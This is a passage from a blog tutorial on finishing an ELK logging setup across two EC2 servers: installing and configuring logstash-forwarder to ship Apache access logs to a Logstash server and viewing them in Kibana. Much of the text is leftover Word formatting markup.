<span style="font-family: "courier new" , "courier" , monospace;">$ sudo
dpkg -i logstash-forwarder_0.2.0_i386.deb</span><o:p></o:p></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">Now create a folder to place the "logstash-forwarder.crt" certificate. Before that we need to import the "logstash-forwarder.crt" cert
file that we created on the EC2_B server. Please do it via necessary scp
commands.<o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ mkdir /etc/certs</span><span style="font-family: "times"; mso-bidi-font-family: Times;"><o:p></o:p></span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "verdana" , sans-serif;">Place
the "logstash-forwarder.crt" file in the /certs folder.Also, </span><span style="font-family: "verdana" , sans-serif;">create the logstash-conf
file:</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<span style="font-family: "courier new" , "courier" , monospace;">$ nano
/etc/logstash-forwarder/logstash-forwarder.conf <o:p></o:p></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">change Below IP to the IP of your Logstash Server</span></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">{</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">"network":</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";"> {</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">"servers": [
“IP[EC2_B]:5000" ],</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">"ssl ca":
"/etc/certs/logstash-forwarder.crt",</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">"timeout": 15</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";"> },</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">"files": [</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";"> {</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">"paths":
["/var/log/apache2/access.log"],</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">"fields": { "type":
"apache-access" }</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";"> }</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">
]</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Revision>0</o:Revision>
<o:TotalTime>0</o:TotalTime>
<o:Pages>1</o:Pages>
<o:Words>34</o:Words>
<o:Characters>197</o:Characters>
<o:Company>flipkart</o:Company>
<o:Lines>1</o:Lines>
<o:Paragraphs>1</o:Paragraphs>
<o:CharactersWithSpaces>230</o:CharactersWithSpaces>
<o:Version>14.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>JA</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
<w:UseFELayout/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Cambria;
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
<!--StartFragment-->
<!--EndFragment--><br />
<div class="MsoNormal">
<span style="color: black; font-family: "courier";">}</span><span style="color: black; font-family: "courier";"><o:p></o:p></span></div>
</div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br />
<span style="font-family: "verdana" , sans-serif;"><b>Now Start the forwarder:</b></span><br />
<div data-angle="0" data-canvas-width="564.2185323489186" data-font-name="g_font_115_0" dir="ltr" style="left: 137px; top: 577.383px; transform-origin: 0% 0% 0px; transform: rotate(0deg) scale(1.0011, 1);">
<span style="font-family: "courier new" , "courier" , monospace;">$ cd /opt/logstash-forwarder</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">$ bin/logstash-forwarder -config="/etc/logstash-forwarder/logstash-forwarder.conf" &</span><br />
<span style="font-family: "verdana" , sans-serif;"><b><br /></b></span>
<span style="font-family: "verdana" , sans-serif;"><b>Finally Starting the Logstash Server on (EC2_B):</b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">$ cd <span style="color: #0e0e0e;">~/</span>logstash-1.4.2/</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">$ bin/logstash -f logstash.conf & <b>--</b><span style="font-size: x-small;">This will start the logstash server </span></span><br />
<br /></div>
</div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br />
<span style="font-family: "verdana" , sans-serif;">Any further changes to the access logs will be now visible in your kibana dashboard. To check the above setup, hit the default apache page @ (http://IP[EC2_A]/) and check the changes recorded by your elastic cluster on the kibana dashboard.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwXHn0K2Zu4KL7vflAyYqWHsVhfKqY1naRwjykvt2VBOczYPXcZTkz5L5CmnGbyCEi9Syx9hRTQzEZhkkVxnN3mBTXNVESThtdy0x-Z8BouO6RK0N5y5zTAnzjCaSdAP2lMoAK11RTFj8/s1600/Screen+Shot+2014-07-27+at+6.54.35+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwXHn0K2Zu4KL7vflAyYqWHsVhfKqY1naRwjykvt2VBOczYPXcZTkz5L5CmnGbyCEi9Syx9hRTQzEZhkkVxnN3mBTXNVESThtdy0x-Z8BouO6RK0N5y5zTAnzjCaSdAP2lMoAK11RTFj8/s1600/Screen+Shot+2014-07-27+at+6.54.35+pm.png" width="640" /></a></div>
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br />
<span style="font-family: "verdana" , sans-serif;">The dashboard I use is my personal favourite, which can be found <a href="https://gist.github.com/rshk/23ff4b0c162ba4b8a326">here</a>.</span><br />
<span style="font-family: "verdana" , sans-serif;">I hope this blog entry will be useful for a successful EKL installation. Do write a comment below if you get stuck anywhere.</span><br />
<br /></div>
<div class="MsoNormal" style="mso-layout-grid-align: none; mso-pagination: none; text-autospace: none;">
<br /></div>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Revision>0</o:Revision>
<o:TotalTime>0</o:TotalTime>
<o:Pages>1</o:Pages>
<o:Words>1071</o:Words>
<o:Characters>6108</o:Characters>
<o:Company>flipkart</o:Company>
<o:Lines>50</o:Lines>
<o:Paragraphs>14</o:Paragraphs>
<o:CharactersWithSpaces>7165</o:CharactersWithSpaces>
<o:Version>14.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>JA</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
<w:UseFELayout/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
